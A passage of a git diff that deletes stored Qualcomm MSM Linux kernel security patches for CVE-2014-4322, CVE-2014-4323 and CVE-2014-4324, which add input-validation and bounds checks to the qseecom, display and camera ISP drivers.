-+ pr_err("Invalid offset 0x%x\n",
-+ cmd_req->ifd_data[i].cmd_buf_offset);
-+ return ++ret;
-+ }
-+ } else if ((listener_svc) && (lstnr_resp->ifd_data[i].fd > 0)) {
-+ if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+ lstnr_resp->resp_len - sizeof(uint32_t)) {
-+ pr_err("Invalid offset 0x%x\n",
-+ lstnr_resp->ifd_data[i].cmd_buf_offset);
-+ return ++ret;
-+ }
-+ }
-+ return ret;
-+}
-+
- static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- struct qseecom_dev_handle *data,
- bool listener_svc)
-@@ -1598,6 +1622,10 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- if (sg_ptr->nents == 1) {
- uint32_t
*update;
- update = (uint32_t *) field;
-+
-+ if (boundary_checks_offset(cmd_req, lstnr_resp, data,
-+ listener_svc, i))
-+ goto err;
- if (cleanup)
- *update = 0;
- else
-@@ -1607,6 +1635,27 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- } else {
- struct qseecom_sg_entry *update;
- int j = 0;
-+
-+ if ((!listener_svc) && (cmd_req->ifd_data[i].fd > 0)) {
-+ if (cmd_req->ifd_data[i].cmd_buf_offset >
-+ cmd_req->cmd_req_len -
-+ sizeof(struct qseecom_sg_entry)) {
-+ pr_err("Invalid offset = 0x%x\n",
-+ cmd_req->ifd_data[i].
-+ cmd_buf_offset);
-+ goto err;
-+ }
-+ } else if ((listener_svc) &&
-+ (lstnr_resp->ifd_data[i].fd > 0)) {
-+ if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+ lstnr_resp->resp_len -
-+ sizeof(struct qseecom_sg_entry)) {
-+ pr_err("Invalid offset = 0x%x\n",
-+ lstnr_resp->ifd_data[i].
-+ cmd_buf_offset);
-+ goto err;
-+ }
-+ }
- update = (struct qseecom_sg_entry *) field;
- for (j = 0; j < sg_ptr->nents; j++) {
- if (cleanup) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch
deleted file mode 100644
index f6c32003..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4322/ANY/0002.patch
+++ /dev/null
@@ -1,383 +0,0 @@
-From e909d95e6bded328e388d5b8d123297bbbb70728 Mon Sep 17 00:00:00 2001
-From: Mona Hossain
-Date: Mon, 3 Nov 2014 17:05:48 -0800
-Subject: qseecom: Add checks for send_cmd inputs
-
-Improve user input validation across send cmd APIs. Add new
-API __validate_send_cmd_inputs() to validate all user provided
-inputs.
-
-Change-Id: Ibbb0c0e7e5483f653bd59b927562b63c1e43c365
-Signed-off-by: Mona Hossain
----
- drivers/misc/qseecom.c | 221 ++++++++++++++++++++++++++++++-------------------
- 1 file changed, 134 insertions(+), 87 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 65001c5..244f1bf 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -981,7 +981,7 @@ static int qseecom_scale_bus_bandwidth(struct qseecom_dev_handle *data,
- }
- if (req_mode > HIGH) {
- pr_err("Invalid bandwidth mode (%d)\n", req_mode);
-- return ret;
-+ return -EINVAL;
- }
-
- /*
-@@ -1834,24 +1834,16 @@ exit:
- return ret;
- }
-
--static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
-+static int __validate_send_cmd_inputs(struct qseecom_dev_handle *data,
- struct qseecom_send_cmd_req *req)
--{
-- int ret = 0;
-- u32 reqd_len_sb_in = 0;
-- struct qseecom_client_send_data_ireq send_data_req;
-- struct qseecom_command_scm_resp resp;
-- unsigned long flags;
-- struct qseecom_registered_app_list *ptr_app;
-- bool found_app = false;
-- int name_len = 0;
-
-+{
- if (!data || !data->client.ihandle) {
- pr_err("Client or client handle is not initialized\n");
- return -EINVAL;
- }
--
-- if (req->cmd_req_buf == NULL || req->resp_buf == NULL) {
-+ if (((req->resp_buf == NULL) && (req->resp_len != 0)) ||
-+ (req->cmd_req_buf == NULL)) {
- pr_err("cmd buffer or response buffer is null\n");
- return -EINVAL;
- }
-@@ -1862,8 +1854,6 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- pr_err("cmd buffer address not within shared bufffer\n");
- return -EINVAL;
- }
--
--
- if (((uintptr_t)req->resp_buf <
-
data->client.user_virt_sb_base) ||
- ((uintptr_t)req->resp_buf >=
-@@ -1871,27 +1861,62 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- pr_err("response buffer address not within shared bufffer\n");
- return -EINVAL;
- }
--
-- if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
-- req->cmd_req_len > data->client.sb_length ||
-- req->resp_len > data->client.sb_length) {
-- pr_err("cmd buffer length or response buffer length not valid\n");
-+ if ((req->cmd_req_len == 0) ||
-+ (req->cmd_req_len > data->client.sb_length) ||
-+ (req->resp_len > data->client.sb_length)) {
-+ pr_err("cmd buf length or response buf length not valid\n");
- return -EINVAL;
- }
--
- if (req->cmd_req_len > UINT_MAX - req->resp_len) {
-- pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
-+ pr_err("Integer overflow detected in req_len & rsp_len\n");
- return -EINVAL;
- }
-
-- reqd_len_sb_in = req->cmd_req_len + req->resp_len;
-- if (reqd_len_sb_in > data->client.sb_length) {
-+ if ((req->cmd_req_len + req->resp_len) > data->client.sb_length) {
- pr_debug("Not enough memory to fit cmd_buf.\n");
- pr_debug("resp_buf.
Required: %u, Available: %zu\n",
-- reqd_len_sb_in, data->client.sb_length);
-+ (req->cmd_req_len + req->resp_len),
-+ data->client.sb_length);
- return -ENOMEM;
- }
-+ if ((uintptr_t)req->cmd_req_buf > (ULONG_MAX - req->cmd_req_len)) {
-+ pr_err("Integer overflow in req_len & cmd_req_buf\n");
-+ return -EINVAL;
-+ }
-+ if ((uintptr_t)req->resp_buf > (ULONG_MAX - req->resp_len)) {
-+ pr_err("Integer overflow in resp_len & resp_buf\n");
-+ return -EINVAL;
-+ }
-+ if (data->client.user_virt_sb_base >
-+ (ULONG_MAX - data->client.sb_length)) {
-+ pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+ return -EINVAL;
-+ }
-+ if ((((uintptr_t)req->cmd_req_buf + req->cmd_req_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length)) ||
-+ (((uintptr_t)req->resp_buf + req->resp_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length))) {
-+ pr_err("cmd buf or resp buf is out of shared buffer region\n");
-+ return -EINVAL;
-+ }
-+ return 0;
-+}
-
-+static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
-+ struct qseecom_send_cmd_req *req)
-+{
-+ int ret = 0;
-+ u32 reqd_len_sb_in = 0;
-+ struct qseecom_client_send_data_ireq send_data_req;
-+ struct qseecom_command_scm_resp resp;
-+ unsigned long flags;
-+ struct qseecom_registered_app_list *ptr_app;
-+ bool found_app = false;
-+ int name_len = 0;
-+
-+ reqd_len_sb_in = req->cmd_req_len + req->resp_len;
- /* find app_id & img_name from list */
- spin_lock_irqsave(&qseecom.registered_app_list_lock, flags);
- list_for_each_entry(ptr_app, &qseecom.registered_app_list_head,
-@@ -1965,6 +1990,10 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
- pr_err("copy_from_user failed\n");
- return ret;
- }
-+
-+ if (__validate_send_cmd_inputs(data, &req))
-+ return -EINVAL;
-+
- ret = __qseecom_send_cmd(data, &req);
-
- if (ret)
-@@ -1973,50 +2002,54 @@ static int qseecom_send_cmd(struct qseecom_dev_handle *data, void __user *argp)
-
return ret;
- }
-
--int boundary_checks_offset(struct qseecom_send_modfd_cmd_req *req,
-+int __boundary_checks_offset(struct qseecom_send_modfd_cmd_req *req,
- struct qseecom_send_modfd_listener_resp *lstnr_resp,
- struct qseecom_dev_handle *data, bool qteec,
- int i) {
-- int ret = 0;
-
- if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- (req->ifd_data[i].fd > 0)) {
- if (qteec) {
-- if (req->ifd_data[i].cmd_buf_offset >
-- req->cmd_req_len - TWO * sizeof(uint32_t)) {
-- pr_err("Invalid offset 0x%x\n",
-+ if ((req->cmd_req_len < (TWO * sizeof(uint32_t))) ||
-+ (req->ifd_data[i].cmd_buf_offset >
-+ req->cmd_req_len - (TWO * sizeof(uint32_t)))) {
-+ pr_err("Invalid offset (QTEEC req len) 0x%x\n",
- req->ifd_data[i].cmd_buf_offset);
-- return ++ret;
-+ return -EINVAL;
- }
- } else {
-- if (req->ifd_data[i].cmd_buf_offset >
-- req->cmd_req_len - sizeof(uint32_t)) {
-- pr_err("Invalid offset 0x%x\n",
-+ if ((req->cmd_req_len < sizeof(uint32_t)) ||
-+ (req->ifd_data[i].cmd_buf_offset >
-+ req->cmd_req_len - sizeof(uint32_t))) {
-+ pr_err("Invalid offset (req len) 0x%x\n",
- req->ifd_data[i].cmd_buf_offset);
-- return ++ret;
-+ return -EINVAL;
- }
- }
- } else if ((data->type == QSEECOM_LISTENER_SERVICE) &&
- (lstnr_resp->ifd_data[i].fd > 0)) {
- if (qteec) {
-- if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-- lstnr_resp->resp_len - TWO * sizeof(uint32_t)) {
-- pr_err("Invalid offset 0x%x\n",
-+ if ((lstnr_resp->resp_len < TWO * sizeof(uint32_t)) ||
-+ (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+ lstnr_resp->resp_len - TWO*sizeof(uint32_t))) {
-+ pr_err("Invalid offset (QTEEC resp len) 0x%x\n",
- lstnr_resp->ifd_data[i].cmd_buf_offset);
-- return ++ret;
-+ return -EINVAL;
- }
- } else {
-- if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-- lstnr_resp->resp_len - sizeof(uint32_t)) {
-- pr_err("Invalid offset 0x%x\n",
-+ if ((lstnr_resp->resp_len < sizeof(uint32_t)) ||
-+ (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+ lstnr_resp->resp_len - sizeof(uint32_t))) {
-+
pr_err("Invalid offset (lstnr resp len) 0x%x\n",
- lstnr_resp->ifd_data[i].cmd_buf_offset);
-- return ++ret;
-+ return -EINVAL;
- }
- }
- }
-- return ret;
-+ return 0;
- }
-
-+#define SG_ENTRY_SZ sizeof(struct qseecom_sg_entry)
- static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- struct qseecom_dev_handle *data, bool qteec)
- {
-@@ -2095,7 +2128,7 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- uint32_t *update;
- update = (uint32_t *) field;
-
-- if (boundary_checks_offset(req, lstnr_resp, data,
-+ if (__boundary_checks_offset(req, lstnr_resp, data,
- qteec, i))
- goto err;
- if (cleanup)
-@@ -2112,22 +2145,25 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
-
- if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- (req->ifd_data[i].fd > 0)) {
-- if (req->ifd_data[i].cmd_buf_offset >
-- req->cmd_req_len -
-- sizeof(struct qseecom_sg_entry)) {
-+
-+ if ((req->cmd_req_len <
-+ SG_ENTRY_SZ * sg_ptr->nents) ||
-+ (req->ifd_data[i].cmd_buf_offset >
-+ (req->cmd_req_len -
-+ SG_ENTRY_SZ * sg_ptr->nents))) {
- pr_err("Invalid offset = 0x%x\n",
-- req->ifd_data[i].
-- cmd_buf_offset);
-+ req->ifd_data[i].cmd_buf_offset);
- goto err;
- }
-+
- } else if ((data->type == QSEECOM_LISTENER_SERVICE) &&
- (lstnr_resp->ifd_data[i].fd > 0)) {
-- if (lstnr_resp->ifd_data[i].cmd_buf_offset >
-- lstnr_resp->resp_len -
-- sizeof(struct qseecom_sg_entry)) {
-- pr_err("Invalid offset = 0x%x\n",
-- lstnr_resp->ifd_data[i].
-- cmd_buf_offset);
-+
-+ if ((lstnr_resp->resp_len <
-+ SG_ENTRY_SZ * sg_ptr->nents) ||
-+ (lstnr_resp->ifd_data[i].cmd_buf_offset >
-+ (lstnr_resp->resp_len -
-+ SG_ENTRY_SZ * sg_ptr->nents))) {
- goto err;
- }
- }
-@@ -2179,37 +2215,14 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- return ret;
- }
-
-- if (req.cmd_req_buf == NULL || req.resp_buf == NULL) {
-- pr_err("cmd buffer or response buffer is null\n");
-- return -EINVAL;
-- }
-- if (((uintptr_t)req.cmd_req_buf <
-- data->client.user_virt_sb_base) ||
-- ((uintptr_t)req.cmd_req_buf >=
-- (data->client.user_virt_sb_base + data->client.sb_length))) {
-- pr_err("cmd buffer address not within shared bufffer\n");
-- return -EINVAL;
-- }
--
-- if (((uintptr_t)req.resp_buf <
-- data->client.user_virt_sb_base) ||
-- ((uintptr_t)req.resp_buf >=
-- (data->client.user_virt_sb_base + data->client.sb_length))) {
-- pr_err("response buffer address not within shared bufffer\n");
-- return -EINVAL;
-- }
--
-- if (req.cmd_req_len == 0 || req.cmd_req_len > data->client.sb_length ||
-- req.resp_len > data->client.sb_length) {
-- pr_err("cmd or response buffer length not valid\n");
-- return -EINVAL;
-- }
--
- send_cmd_req.cmd_req_buf = req.cmd_req_buf;
- send_cmd_req.cmd_req_len = req.cmd_req_len;
- send_cmd_req.resp_buf = req.resp_buf;
- send_cmd_req.resp_len = req.resp_len;
-
-+ if (__validate_send_cmd_inputs(data, &send_cmd_req))
-+ return -EINVAL;
-+
- /* validate offsets */
- for (i = 0; i < MAX_ION_FD; i++) {
- if (req.ifd_data[i].cmd_buf_offset >= req.cmd_req_len) {
-@@ -2897,6 +2910,9 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf,
- req.cmd_req_buf = send_buf;
- req.resp_buf = resp_buf;
-
-+ if (__validate_send_cmd_inputs(data, &req))
-+ return -EINVAL;
-+
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
- if (qseecom.support_bus_scaling) {
-@@ -4111,6 +4127,19 @@ static int qseecom_save_partition_hash(void __user *argp)
- static int
__qseecom_qteec_validate_msg(struct qseecom_dev_handle *data,
- struct qseecom_qteec_req *req)
- {
-+
-+ if (req->req_len > UINT_MAX - req->resp_len) {
-+ pr_err("Integer overflow detected in req_len & rsp_len\n");
-+ return -EINVAL;
-+ }
-+
-+ if (req->req_len + req->resp_len > data->client.sb_length) {
-+ pr_debug("Not enough memory to fit cmd_buf.\n");
-+ pr_debug("resp_buf. Required: %u, Available: %zu\n",
-+ (req->req_len + req->resp_len), data->client.sb_length);
-+ return -ENOMEM;
-+ }
-+
- if (req->req_ptr == NULL || req->resp_ptr == NULL) {
- pr_err("cmd buffer or response buffer is null\n");
- return -EINVAL;
-@@ -4131,15 +4160,33 @@ static int __qseecom_qteec_validate_msg(struct qseecom_dev_handle *data,
- return -EINVAL;
- }
-
-- if ((req->req_len == 0) || (req->resp_len == 0) ||
-- req->req_len > data->client.sb_length ||
-- req->resp_len > data->client.sb_length) {
-+ if ((req->req_len == 0) || (req->resp_len == 0)) {
- pr_err("cmd buf lengtgh/response buf length not valid\n");
- return -EINVAL;
- }
-
-- if (req->req_len > UINT_MAX - req->resp_len) {
-- pr_err("Integer overflow detected in req_len/rsp_len, exit\n");
-+ if ((uintptr_t)req->req_ptr > (ULONG_MAX - req->req_len)) {
-+ pr_err("Integer overflow in req_len & req_ptr\n");
-+ return -EINVAL;
-+ }
-+
-+ if ((uintptr_t)req->resp_ptr > (ULONG_MAX - req->resp_len)) {
-+ pr_err("Integer overflow in resp_len & resp_ptr\n");
-+ return -EINVAL;
-+ }
-+
-+ if (data->client.user_virt_sb_base >
-+ (ULONG_MAX - data->client.sb_length)) {
-+ pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+ return -EINVAL;
-+ }
-+ if ((((uintptr_t)req->req_ptr + req->req_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length)) ||
-+ (((uintptr_t)req->resp_ptr + req->resp_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length))) {
-+ pr_err("cmd buf or resp buf is out of shared buffer region\n");
- return -EINVAL;
- }
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch
deleted file mode 100644
index c68dbaf0..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4323/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 014fa8def84c62893fa016e873c12de1da498603 Mon Sep 17 00:00:00 2001
-From: raghavendra ambadas
-Date: Mon, 6 Oct 2014 14:59:57 +0530
-Subject: msm: mdp: Validate input arguments from user space
-
-Fully verify the input arguments from user client are safe
-to use.
-
-Change-Id: Ie14332443b187951009c63ebfb78456dcd9ba60f
-Signed-off-by: Raghavendra Ambadas
----
- drivers/video/msm/mdp.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/video/msm/mdp.c b/drivers/video/msm/mdp.c
-index 4ede0b52..c00bd78 100644
---- a/drivers/video/msm/mdp.c
-+++ b/drivers/video/msm/mdp.c
-@@ -485,6 +485,11 @@ static int mdp_lut_hw_update(struct fb_cmap *cmap)
- c[1] = cmap->blue;
- c[2] = cmap->red;
-
-+ if (cmap->start > MDP_HIST_LUT_SIZE || cmap->len > MDP_HIST_LUT_SIZE ||
-+ (cmap->start + cmap->len > MDP_HIST_LUT_SIZE)) {
-+ pr_err("mdp_lut_hw_update invalid arguments\n");
-+ return -EINVAL;
-+ }
- for (i = 0; i < cmap->len; i++) {
- if (copy_from_user(&r, cmap->red++, sizeof(r)) ||
- copy_from_user(&g, cmap->green++, sizeof(g)) ||
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch
deleted file mode 100644
index 37e7a938..00000000
--- a/Patches/Linux_CVEs/CVE-2014-4324/ANY/0001.patch
+++ /dev/null
@@ -1,308 +0,0 @@
-From 8ad163e831a2b2c30551edb360f168a604cdb0bb Mon Sep 17 00:00:00 2001
-From: Alok Kediya
-Date: Fri, 12 Dec 2014 04:20:59 -0800
-Subject: msm: camera: isp: Validate input parameter for vfe_write and vfe_read
-
-Validate input parameters for read and write operations in vfe to
-ensure operations are performed within vfe register boundary and
-within structure limits passed by caller.
-
-Change-Id: If3719de65b32773c2b6ff904da76a951dbfb11eb
-Signed-off-by: Alok Kediya
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c | 162 ++++++++++++++-------
- .../msm/camera_v2/sensor/io/msm_camera_io_util.c | 11 ++
- .../msm/camera_v2/sensor/io/msm_camera_io_util.h | 2 +
- 3 files changed, 119 insertions(+), 56 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 620c01a..e1b79ce 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -494,9 +494,24 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- struct msm_vfe_reg_cfg_cmd *reg_cfg_cmd,
- uint32_t *cfg_data, uint32_t cmd_len)
- {
-+ if (!vfe_dev || !reg_cfg_cmd) {
-+ pr_err("%s:%d failed: vfe_dev %p reg_cfg_cmd %p\n", __func__,
-+ __LINE__, vfe_dev, reg_cfg_cmd);
-+ return -EINVAL;
-+ }
-+ if ((reg_cfg_cmd->cmd_type != VFE_CFG_MASK) &&
-+ (!cfg_data || !cmd_len)) {
-+ pr_err("%s:%d failed: cmd type %d cfg_data %p cmd_len %d\n",
-+ __func__, __LINE__, reg_cfg_cmd->cmd_type, cfg_data,
-+ cmd_len);
-+ return -EINVAL;
-+ }
-+
-+ /* Validate input parameters */
- switch (reg_cfg_cmd->cmd_type) {
- case VFE_WRITE:
-- case VFE_READ: {
-+ case VFE_READ:
-+ case VFE_WRITE_MB: {
- if ((reg_cfg_cmd->u.rw_info.reg_offset >
- (UINT_MAX - reg_cfg_cmd->u.rw_info.len)) ||
- ((reg_cfg_cmd->u.rw_info.reg_offset +
-@@ -522,6 +537,58 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- }
- break;
- }
-+
-+ case
VFE_WRITE_DMI_16BIT:
-+ case VFE_WRITE_DMI_32BIT:
-+ case VFE_WRITE_DMI_64BIT:
-+ case VFE_READ_DMI_16BIT:
-+ case VFE_READ_DMI_32BIT:
-+ case VFE_READ_DMI_64BIT: {
-+ if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-+ if ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset <=
-+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset) ||
-+ (reg_cfg_cmd->u.dmi_info.hi_tbl_offset -
-+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset !=
-+ (sizeof(uint32_t)))) {
-+ pr_err("%s:%d hi %d lo %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset);
-+ return -EINVAL;
-+ }
-+ if (reg_cfg_cmd->u.dmi_info.len <= sizeof(uint32_t)) {
-+ pr_err("%s:%d len %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.dmi_info.len);
-+ return -EINVAL;
-+ }
-+ if (((UINT_MAX -
-+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset) <
-+ (reg_cfg_cmd->u.dmi_info.len -
-+ sizeof(uint32_t))) ||
-+ ((reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-+ reg_cfg_cmd->u.dmi_info.len -
-+ sizeof(uint32_t)) > cmd_len)) {
-+ pr_err("%s:%d hi_tbl_offset %d len %d cmd %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.dmi_info.hi_tbl_offset,
-+ reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+ return -EINVAL;
-+ }
-+ }
-+ if ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset >
-+ (UINT_MAX - reg_cfg_cmd->u.dmi_info.len)) ||
-+ ((reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
-+ reg_cfg_cmd->u.dmi_info.len) > cmd_len)) {
-+ pr_err("%s:%d lo_tbl_offset %d len %d cmd_len %d\n",
-+ __func__, __LINE__,
-+ reg_cfg_cmd->u.dmi_info.lo_tbl_offset,
-+ reg_cfg_cmd->u.dmi_info.len, cmd_len);
-+ return -EINVAL;
-+ }
-+ break;
-+ }
-+
- default:
- break;
- }
-@@ -535,39 +602,27 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- break;
- }
- case VFE_WRITE_MB: {
-- uint32_t *data_ptr = cfg_data +
-- reg_cfg_cmd->u.rw_info.cmd_data_offset/4;
--
-- if ((UINT_MAX - sizeof(*data_ptr) <
-- reg_cfg_cmd->u.rw_info.reg_offset) ||
-- (resource_size(vfe_dev->vfe_mem) <
-- reg_cfg_cmd->u.rw_info.reg_offset +
-- sizeof(*data_ptr))) {
-- pr_err("%s:
VFE_WRITE_MB: Invalid length\n", __func__);
-- return -EINVAL;
-- }
-- msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base +
-- reg_cfg_cmd->u.rw_info.reg_offset);
-+ msm_camera_io_memcpy_mb(vfe_dev->vfe_base +
-+ reg_cfg_cmd->u.rw_info.reg_offset,
-+ cfg_data + reg_cfg_cmd->u.rw_info.cmd_data_offset/4,
-+ reg_cfg_cmd->u.rw_info.len);
- break;
- }
- case VFE_CFG_MASK: {
- uint32_t temp;
-- if (resource_size(vfe_dev->vfe_mem) <
-- reg_cfg_cmd->u.mask_info.reg_offset)
-- return -EINVAL;
-- temp = msm_camera_io_r(vfe_dev->vfe_base +
-- reg_cfg_cmd->u.mask_info.reg_offset);
--
-- temp &= ~reg_cfg_cmd->u.mask_info.mask;
-- temp |= reg_cfg_cmd->u.mask_info.val;
- if ((UINT_MAX - sizeof(temp) <
-- reg_cfg_cmd->u.mask_info.reg_offset) ||
-+ reg_cfg_cmd->u.mask_info.reg_offset) ||
- (resource_size(vfe_dev->vfe_mem) <
- reg_cfg_cmd->u.mask_info.reg_offset +
- sizeof(temp))) {
- pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__);
- return -EINVAL;
- }
-+ temp = msm_camera_io_r(vfe_dev->vfe_base +
-+ reg_cfg_cmd->u.mask_info.reg_offset);
-+
-+ temp &= ~reg_cfg_cmd->u.mask_info.mask;
-+ temp |= reg_cfg_cmd->u.mask_info.val;
- msm_camera_io_w(temp, vfe_dev->vfe_base +
- reg_cfg_cmd->u.mask_info.reg_offset);
- break;
-@@ -579,22 +634,9 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- uint32_t hi_val, lo_val, lo_val1;
- if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
-- if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset <
-- reg_cfg_cmd->u.dmi_info.len) ||
-- (reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-- reg_cfg_cmd->u.dmi_info.len > cmd_len)) {
-- pr_err("Invalid Hi Table out of bounds\n");
-- return -EINVAL;
-- }
- hi_tbl_ptr = cfg_data +
- reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- }
--
-- if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
-- reg_cfg_cmd->u.dmi_info.len > cmd_len) {
-- pr_err("Invalid Lo Table out of bounds\n");
-- return -EINVAL;
-- }
- lo_tbl_ptr = cfg_data +
-
reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
- if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT)
-@@ -627,30 +669,18 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- uint32_t hi_val, lo_val, lo_val1;
- if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
-- if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-- reg_cfg_cmd->u.dmi_info.len > cmd_len) {
-- pr_err("Invalid Hi Table out of bounds\n");
-- return -EINVAL;
-- }
- hi_tbl_ptr = cfg_data +
- reg_cfg_cmd->u.dmi_info.hi_tbl_offset/4;
- }
-
-- if (reg_cfg_cmd->u.dmi_info.lo_tbl_offset +
-- reg_cfg_cmd->u.dmi_info.len > cmd_len) {
-- pr_err("Invalid Lo Table out of bounds\n");
-- return -EINVAL;
-- }
- lo_tbl_ptr = cfg_data +
- reg_cfg_cmd->u.dmi_info.lo_tbl_offset/4;
-
-- for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
-- if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
-- hi_val = msm_camera_io_r(vfe_dev->vfe_base +
-- vfe_dev->hw_info->dmi_reg_offset);
-- *hi_tbl_ptr++ = hi_val;
-- }
-+ if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT)
-+ reg_cfg_cmd->u.dmi_info.len =
-+ reg_cfg_cmd->u.dmi_info.len / 2;
-
-+ for (i = 0; i < reg_cfg_cmd->u.dmi_info.len/4; i++) {
- lo_val = msm_camera_io_r(vfe_dev->vfe_base +
- vfe_dev->hw_info->dmi_reg_offset + 0x4);
-
-@@ -660,6 +690,13 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- lo_val |= lo_val1 << 16;
- }
- *lo_tbl_ptr++ = lo_val;
-+ if (reg_cfg_cmd->cmd_type == VFE_READ_DMI_64BIT) {
-+ hi_val = msm_camera_io_r(vfe_dev->vfe_base +
-+ vfe_dev->hw_info->dmi_reg_offset);
-+ *hi_tbl_ptr = hi_val;
-+ hi_tbl_ptr += 2;
-+ lo_tbl_ptr++;
-+ }
- }
- break;
- }
-@@ -698,7 +735,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- if ((data_ptr < cfg_data) ||
- (UINT_MAX / sizeof(*data_ptr) <
- (data_ptr - cfg_data)) ||
-- (sizeof(*data_ptr) * (data_ptr - cfg_data) >
-+ (sizeof(*data_ptr) * (data_ptr - cfg_data) >=
- cmd_len))
- return -EINVAL;
- *data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base +
-@@ -707,9 +744,16 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- }
- break;
- }
-- case GET_SOC_HW_VER:
-- *cfg_data = vfe_dev->soc_hw_version;
-- break;
-+ case GET_SOC_HW_VER: {
-+ if (cmd_len < sizeof(uint32_t)) {
-+ pr_err("%s:%d failed: invalid cmd len %u exp %zu\n",
-+ __func__, __LINE__, cmd_len,
-+ sizeof(uint32_t));
-+ return -EINVAL;
-+ }
-+ *cfg_data = vfe_dev->soc_hw_version;
-+ break;
-+ }
- case GET_MAX_CLK_RATE: {
- int rc = 0;
-
-@@ -728,6 +772,12 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- break;
- }
- case SET_WM_UB_SIZE: {
-+ if (cmd_len < sizeof(uint32_t)) {
-+ pr_err("%s:%d failed: invalid cmd len %u exp %zu\n",
-+ __func__, __LINE__, cmd_len,
-+ sizeof(uint32_t));
-+ return -EINVAL;
-+ }
- vfe_dev->vfe_ub_size = *cfg_data;
- break;
- }
